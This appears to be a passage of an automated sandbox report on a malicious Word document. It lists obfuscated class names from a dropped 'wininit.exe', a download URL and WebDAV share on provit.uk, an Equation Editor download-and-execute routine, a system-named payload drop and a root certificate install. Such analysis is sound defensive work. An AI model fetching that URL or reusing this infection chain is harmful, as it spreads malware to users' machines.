Source: 16.2.wininit.exe.4e00000.6.raw.unpack, BDLA7ZzmjyZeMHspbI.cs	High entropy of concatenated method names: 'pYcc3qb4LP', 'iVMcFnRmTf', 'kjSch2OmFh', 'dPKcNtftA0', 'ep5cukejfW', 'DLtcmCOIuX', 'lWKctS9MXy', 'aH8c6uleZm', 'Py5cgNOThj', 'aoVcHMdwZP'
Source: 16.2.wininit.exe.4e00000.6.raw.unpack, dhK9KbNqZASI81hGMI.cs	High entropy of concatenated method names: 'sfGQv3qveH', 'Gk1QTJCxla', 'PF0QGPZ0c9', 'ecJQiiiaj1', 'k6KQn6iR71', 'XSqGYjTQNd', 'dr0GDj07xW', 'z70GSox8Zc', 'UUbGWZII6b', 'n2XGkeHKAq'
Source: 16.2.wininit.exe.4e00000.6.raw.unpack, eWbKPQURAh7q0dXmWQa.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'g6Ics1b5Q4', 'lHScanO8Hq', 'nGHc7Kj1b4', 'Nkvc4EEFTo', 'W1ncOKfXll', 'RBGc1YrhiV', 'W60cEbFZA3'
Source: 16.2.wininit.exe.4e00000.6.raw.unpack, blpmsJDcqDTfApNEE9.cs	High entropy of concatenated method names: 'sXHIWBvUB1', 'gM3IXliyxi', 'LAkjRqtjrT', 'irsjUBXqk4', 'suWIscc6eO', 'adBIa4DbBY', 'bhgI7Ap3yt', 'JJPI44IQ2E', 'x1FIOfmaQo', 'J1LI18bvGD'
Source: 16.2.wininit.exe.4e00000.6.raw.unpack, asC2VyhwMrPC2xZIhl.cs	High entropy of concatenated method names: 'ARKCb4vRER', 'PfqC3SbNpI', 'gFNCFAwu0h', 'N7QChL3WU5', 'egwCMgpiYw', 'gXBCZhOmb9', 'HiyCI68I54', 'NnfCj0kphm', 'uQfCdb2Dm9', 'VKQCcjYmRN'
Source: 16.2.wininit.exe.4e00000.6.raw.unpack, rXxk4UXv0hG6nJr2r4.cs	High entropy of concatenated method names: 'NY8cCHPCTo', 'v1YcGMuL0j', 'PlDcQ98GnS', 'gHrci7Rn0Y', 'LTtcdZa6tk', 'WgxcnQGGAx', 'Next', 'Next', 'Next', 'NextBytes'
Source: 16.2.wininit.exe.4e00000.6.raw.unpack, wtca6eCuhSEXbwj87j.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'NPhBk6IATb', 'NUrBXV5rDr', 'w4vBzP3VTO', 'Fum8R26vkD', 'BSQ8UGxs3m', 'FAr8ByJM0s', 'KyD88tXy3T', 'HwpHMYNZUsK33x2B4cE'
Source: 16.2.wininit.exe.4e00000.6.raw.unpack, Y1v65cTfYUkeaqQPAC.cs	High entropy of concatenated method names: 'Dispose', 'xaYUki41xL', 'hXyBuxl6Ko', 'sWJJotluKH', 'NwmUXu8WJh', 'n33Uzq0LEr', 'ProcessDialogKey', 'eg6BR76f1h', 'lmIBU3Lkqh', 'k4kBBdXxk4'
Source: 16.2.wininit.exe.4e00000.6.raw.unpack, Urg7ubUUcCev0u1dT4r.cs	High entropy of concatenated method names: 'x1jcXgXCGN', 'fvScz1QqAG', 'XKdfRDMKeD', 'LkffUlITX0', 'gnrfBIBAS5', 'AUdf8iyEhN', 'OqwfeZeTlt', 'XAwfvt7blr', 'PnmfKyehow', 'jKVfTiMyVU'
Source: 16.2.wininit.exe.4e00000.6.raw.unpack, e7gKPApuQs0EWyVG9T.cs	High entropy of concatenated method names: 'YtHQ1avdnI', 'sCKQEBr9Vg', 'RWkQYVTVi9', 'ToString', 'plbQDysEAl', 'QkLQSVFMsJ', 'tyg4QgZnFbC608q3Vvw', 'upiOboZCPTUWbVTJlXN', 'Gr55C2Z22jsqV8xooje'
Source: 16.2.wininit.exe.4e00000.6.raw.unpack, ywjJDxuXXl5HvcWFju.cs	High entropy of concatenated method names: 'jd1XQnZrwVnLTEDCpNd', 'KywlMNZsQBmADPfNGNl', 'EO5xIiZj2NflMbVFU0Z', 'bmHQjhGy3F', 'nonQdcl1E2', 'QAuQcAH5On', 'J0YoVWZ0gtheKhdG88p', 'Cx56OgZEqBuvdXaLqeJ', 'i4yDHfZGP0q4hERawKj'
Source: 16.2.wininit.exe.4e00000.6.raw.unpack, BE5k0LFu5KnoWIB8ne.cs	High entropy of concatenated method names: 'QPjT47v345', 'bMaTO5YD1n', 'qL4T1ROcj5', 'B15TEN4D6d', 'noKTY6WZW0', 'KIATDaS7hq', 'wqZTSXrG3c', 'UUKTWm9AvU', 'JPFTkkWlg3', 'zCGTXs1q8C'
Source: 16.2.wininit.exe.4e00000.6.raw.unpack, hlfKZ6407CBnHJSie5.cs	High entropy of concatenated method names: 'Q4eMPdDINF', 'dABMaa0v9G', 'm1iM46hmGb', 'F35MOwisjH', 'gV1MuYpY1I', 'NEEM9yiVrf', 'T49MmVVXB8', 'vepMttiwtX', 'mSgMp2U8YB', 'OrnM5Qgsgs'
Source: 16.2.wininit.exe.4e00000.6.raw.unpack, mO72Zbe7qFQORHthPZ.cs	High entropy of concatenated method names: 'IGyUiE5k0L', 'H5KUnnoWIB', 'BwMUVrPC2x', 'pIhUqlJdZP', 'PPIUMX2ehK', 'HKbUZqZASI', 'DrLniM6qODKrhYmosh', 'nIUaEjW6YOpveRetEf', 'lhUUUXaivS', 'm33U8VTlfn'
Source: 16.2.wininit.exe.4e00000.6.raw.unpack, BwnBSkUenCTHkiiG70o.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 't9EwdUeNcg', 'GcswcCxhlR', 'javwf2GxHL', 'M0CwwEMwtd', 'Q2vw2fUeVe', 'b1uwLEqNHF', 'ty2w6esgdc'
Source: 16.2.wininit.exe.4e00000.6.raw.unpack, kvk9jqBMEXOK4a7rYr.cs	High entropy of concatenated method names: 'UuhxF135Y', 'XnebOGXXx', 'gxo3kDLoB', 'IZJ0qtrjN', 'ArxhXNkJK', 'HajJcBQ7r', 'n91mUTemEhJ9mZBp51', 'RNVkhEo862ysWOUwJ8', 'K5EjtOTxM', 'YgrcQvyG5'
Source: 16.2.wininit.exe.4e00000.6.raw.unpack, iWse1KSS7gaYi41xLP.cs	High entropy of concatenated method names: 'K0RdMuvAqt', 'BmMdIEKRT2', 'RJfddnVaQa', 'fcWdf4WTkd', 'FJpd2JdMAg', 'XKNd6ZbKD7', 'Dispose', 'S0pjKughCJ', 'Jr6jTQ28or', 'sGujCe3UVH'
Source: 16.2.wininit.exe.4e00000.6.raw.unpack, eqDwEc5eNbqOMrRccw.cs	High entropy of concatenated method names: 'wsUiKpO8LJ', 'mKeiCuOl5m', 'c76iQWyI7L', 'dG5QXo2Ph5', 's31QzmMPm6', 'tdCiRDR4Xc', 'uVniU0FJwJ', 'vCpiBNnNh2', 'C33i8WyDuh', 'C2FienmEHx'
Source: 16.2.wininit.exe.4e00000.6.raw.unpack, lBiWxolWI4mIKrpo6Q.cs	High entropy of concatenated method names: 'c6sigqBTbc', 'bA5iHPDRJZ', 'nVIix7HMEI', 'lu8ibUgJBG', 'xQBiyYxTKA', 'Uu3i30xC8r', 'tkNi0FhmID', 'g94iF3DidF', 'LljihX3H7C', 'EeQiJ9voDB'
Source: 16.2.wininit.exe.4e00000.6.raw.unpack, eenOKjUBoGmHCNGsevJ.cs	High entropy of concatenated method names: 'ToString', 'dynfFoMNSH', 'NPbfhRtonL', 'EsyfJMHbTy', 'SVXfNgrEu2', 'gXWfupVDI1', 'SHPf95laLM', 'jw8fm0999e', 'fKvmhvcqCxomhRmxrhd', 'yiGgBXc63lwjv54kfh4'
Source: 16.2.wininit.exe.4e00000.6.raw.unpack, urCQEP7xb0Mxs3L7dv.cs	High entropy of concatenated method names: 'RvKAFRNiNm', 'LurAhHQlM9', 'T4WANS9Td2', 'zsCAu6BpFD', 'rgOAmBGW2g', 'rqsAtd3WxD', 'soHA5yy9T5', 'ydbAoD9Y2p', 'hKxAPfH77o', 'nuVAs99LcQ'
Source: 16.2.wininit.exe.4e00000.6.raw.unpack, x76f1hkrmI3Lkqhn4k.cs	High entropy of concatenated method names: 'E0fdNAeGf6', 'b0Idu8bJEp', 'twmd91E48s', 'oKldmWYHus', 'MhbdtHQOm8', 'RPXdp8Pfdb', 'ArPd5HbWfX', 'Uw5doQYgDG', 'QX0dlENjSW', 'cr1dPT1aQr'
Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, KQkH3in3AYxtB1JkcI.cs	High entropy of concatenated method names: 'gwb8vauN76', 'coJ8KZpJSC', 'fZs8T6XHIb', 'uqG8CFeqcY', 'Xrh8GBbB4F', 'F5A8QvMX8N', 'Mhg8iMMyDK', 'IwJ8nhpBnt', 'ppo8rHM5l3', 'zKB8VcEgFn'
Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, BDLA7ZzmjyZeMHspbI.cs	High entropy of concatenated method names: 'pYcc3qb4LP', 'iVMcFnRmTf', 'kjSch2OmFh', 'dPKcNtftA0', 'ep5cukejfW', 'DLtcmCOIuX', 'lWKctS9MXy', 'aH8c6uleZm', 'Py5cgNOThj', 'aoVcHMdwZP'
Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, dhK9KbNqZASI81hGMI.cs	High entropy of concatenated method names: 'sfGQv3qveH', 'Gk1QTJCxla', 'PF0QGPZ0c9', 'ecJQiiiaj1', 'k6KQn6iR71', 'XSqGYjTQNd', 'dr0GDj07xW', 'z70GSox8Zc', 'UUbGWZII6b', 'n2XGkeHKAq'
Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, eWbKPQURAh7q0dXmWQa.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'g6Ics1b5Q4', 'lHScanO8Hq', 'nGHc7Kj1b4', 'Nkvc4EEFTo', 'W1ncOKfXll', 'RBGc1YrhiV', 'W60cEbFZA3'
Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, blpmsJDcqDTfApNEE9.cs	High entropy of concatenated method names: 'sXHIWBvUB1', 'gM3IXliyxi', 'LAkjRqtjrT', 'irsjUBXqk4', 'suWIscc6eO', 'adBIa4DbBY', 'bhgI7Ap3yt', 'JJPI44IQ2E', 'x1FIOfmaQo', 'J1LI18bvGD'
Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, asC2VyhwMrPC2xZIhl.cs	High entropy of concatenated method names: 'ARKCb4vRER', 'PfqC3SbNpI', 'gFNCFAwu0h', 'N7QChL3WU5', 'egwCMgpiYw', 'gXBCZhOmb9', 'HiyCI68I54', 'NnfCj0kphm', 'uQfCdb2Dm9', 'VKQCcjYmRN'
Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, rXxk4UXv0hG6nJr2r4.cs	High entropy of concatenated method names: 'NY8cCHPCTo', 'v1YcGMuL0j', 'PlDcQ98GnS', 'gHrci7Rn0Y', 'LTtcdZa6tk', 'WgxcnQGGAx', 'Next', 'Next', 'Next', 'NextBytes'
Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, wtca6eCuhSEXbwj87j.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'NPhBk6IATb', 'NUrBXV5rDr', 'w4vBzP3VTO', 'Fum8R26vkD', 'BSQ8UGxs3m', 'FAr8ByJM0s', 'KyD88tXy3T', 'HwpHMYNZUsK33x2B4cE'
Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, Y1v65cTfYUkeaqQPAC.cs	High entropy of concatenated method names: 'Dispose', 'xaYUki41xL', 'hXyBuxl6Ko', 'sWJJotluKH', 'NwmUXu8WJh', 'n33Uzq0LEr', 'ProcessDialogKey', 'eg6BR76f1h', 'lmIBU3Lkqh', 'k4kBBdXxk4'
Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, Urg7ubUUcCev0u1dT4r.cs	High entropy of concatenated method names: 'x1jcXgXCGN', 'fvScz1QqAG', 'XKdfRDMKeD', 'LkffUlITX0', 'gnrfBIBAS5', 'AUdf8iyEhN', 'OqwfeZeTlt', 'XAwfvt7blr', 'PnmfKyehow', 'jKVfTiMyVU'
Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, e7gKPApuQs0EWyVG9T.cs	High entropy of concatenated method names: 'YtHQ1avdnI', 'sCKQEBr9Vg', 'RWkQYVTVi9', 'ToString', 'plbQDysEAl', 'QkLQSVFMsJ', 'tyg4QgZnFbC608q3Vvw', 'upiOboZCPTUWbVTJlXN', 'Gr55C2Z22jsqV8xooje'
Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, ywjJDxuXXl5HvcWFju.cs	High entropy of concatenated method names: 'jd1XQnZrwVnLTEDCpNd', 'KywlMNZsQBmADPfNGNl', 'EO5xIiZj2NflMbVFU0Z', 'bmHQjhGy3F', 'nonQdcl1E2', 'QAuQcAH5On', 'J0YoVWZ0gtheKhdG88p', 'Cx56OgZEqBuvdXaLqeJ', 'i4yDHfZGP0q4hERawKj'
Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, BE5k0LFu5KnoWIB8ne.cs	High entropy of concatenated method names: 'QPjT47v345', 'bMaTO5YD1n', 'qL4T1ROcj5', 'B15TEN4D6d', 'noKTY6WZW0', 'KIATDaS7hq', 'wqZTSXrG3c', 'UUKTWm9AvU', 'JPFTkkWlg3', 'zCGTXs1q8C'
Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, hlfKZ6407CBnHJSie5.cs	High entropy of concatenated method names: 'Q4eMPdDINF', 'dABMaa0v9G', 'm1iM46hmGb', 'F35MOwisjH', 'gV1MuYpY1I', 'NEEM9yiVrf', 'T49MmVVXB8', 'vepMttiwtX', 'mSgMp2U8YB', 'OrnM5Qgsgs'
Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, mO72Zbe7qFQORHthPZ.cs	High entropy of concatenated method names: 'IGyUiE5k0L', 'H5KUnnoWIB', 'BwMUVrPC2x', 'pIhUqlJdZP', 'PPIUMX2ehK', 'HKbUZqZASI', 'DrLniM6qODKrhYmosh', 'nIUaEjW6YOpveRetEf', 'lhUUUXaivS', 'm33U8VTlfn'
Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, BwnBSkUenCTHkiiG70o.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 't9EwdUeNcg', 'GcswcCxhlR', 'javwf2GxHL', 'M0CwwEMwtd', 'Q2vw2fUeVe', 'b1uwLEqNHF', 'ty2w6esgdc'
Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, kvk9jqBMEXOK4a7rYr.cs	High entropy of concatenated method names: 'UuhxF135Y', 'XnebOGXXx', 'gxo3kDLoB', 'IZJ0qtrjN', 'ArxhXNkJK', 'HajJcBQ7r', 'n91mUTemEhJ9mZBp51', 'RNVkhEo862ysWOUwJ8', 'K5EjtOTxM', 'YgrcQvyG5'
Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, iWse1KSS7gaYi41xLP.cs	High entropy of concatenated method names: 'K0RdMuvAqt', 'BmMdIEKRT2', 'RJfddnVaQa', 'fcWdf4WTkd', 'FJpd2JdMAg', 'XKNd6ZbKD7', 'Dispose', 'S0pjKughCJ', 'Jr6jTQ28or', 'sGujCe3UVH'
Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, eqDwEc5eNbqOMrRccw.cs	High entropy of concatenated method names: 'wsUiKpO8LJ', 'mKeiCuOl5m', 'c76iQWyI7L', 'dG5QXo2Ph5', 's31QzmMPm6', 'tdCiRDR4Xc', 'uVniU0FJwJ', 'vCpiBNnNh2', 'C33i8WyDuh', 'C2FienmEHx'
Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, lBiWxolWI4mIKrpo6Q.cs	High entropy of concatenated method names: 'c6sigqBTbc', 'bA5iHPDRJZ', 'nVIix7HMEI', 'lu8ibUgJBG', 'xQBiyYxTKA', 'Uu3i30xC8r', 'tkNi0FhmID', 'g94iF3DidF', 'LljihX3H7C', 'EeQiJ9voDB'
Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, eenOKjUBoGmHCNGsevJ.cs	High entropy of concatenated method names: 'ToString', 'dynfFoMNSH', 'NPbfhRtonL', 'EsyfJMHbTy', 'SVXfNgrEu2', 'gXWfupVDI1', 'SHPf95laLM', 'jw8fm0999e', 'fKvmhvcqCxomhRmxrhd', 'yiGgBXc63lwjv54kfh4'
Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, urCQEP7xb0Mxs3L7dv.cs	High entropy of concatenated method names: 'RvKAFRNiNm', 'LurAhHQlM9', 'T4WANS9Td2', 'zsCAu6BpFD', 'rgOAmBGW2g', 'rqsAtd3WxD', 'soHA5yy9T5', 'ydbAoD9Y2p', 'hKxAPfH77o', 'nuVAs99LcQ'
Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, x76f1hkrmI3Lkqhn4k.cs	High entropy of concatenated method names: 'E0fdNAeGf6', 'b0Idu8bJEp', 'twmd91E48s', 'oKldmWYHus', 'MhbdtHQOm8', 'RPXdp8Pfdb', 'ArPd5HbWfX', 'Uw5doQYgDG', 'QX0dlENjSW', 'cr1dPT1aQr'

Persistence and Installation Behavior

Microsoft Office launches external ms-search protocol handler (WebDAV)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \Device\RdpDr\;:1\provit.uk@SSL\DavWWWRoot			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \Device\RdpDr\;:1\provit.uk@SSL\DavWWWRoot			Jump to behavior

Contains an external reference to another file

Source: settings.xml.rels

Extracted files from sample: https://provit.uk/ib9yle?&shoelace=strong&skyscraper=discreet&roll=thoughtful&mimosa=wacky&vulture

Drops PE files with benign system names

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\wininit.exe

Jump to dropped file

Installs new ROOT certificates

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob

Jump to behavior

Office drops RTF file

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File dump: seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seethebestthignsalwaysgivnebestthigns[1].doc.0.dr			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File dump: 18F2865F.doc.0.dr			Jump to dropped file

Office viewer loads remote template

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Section loaded: netapi32.dll and davhlpr.dll loaded

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 8_2_035F0499 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,

8_2_035F0499

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\caspol[1].exe	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\wininit.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\b2mggwzy\b2mggwzy.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\wininit.exe	File created: C:\Users\user\AppData\Roaming\CF97F5\5879F5.exe (copy)	Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
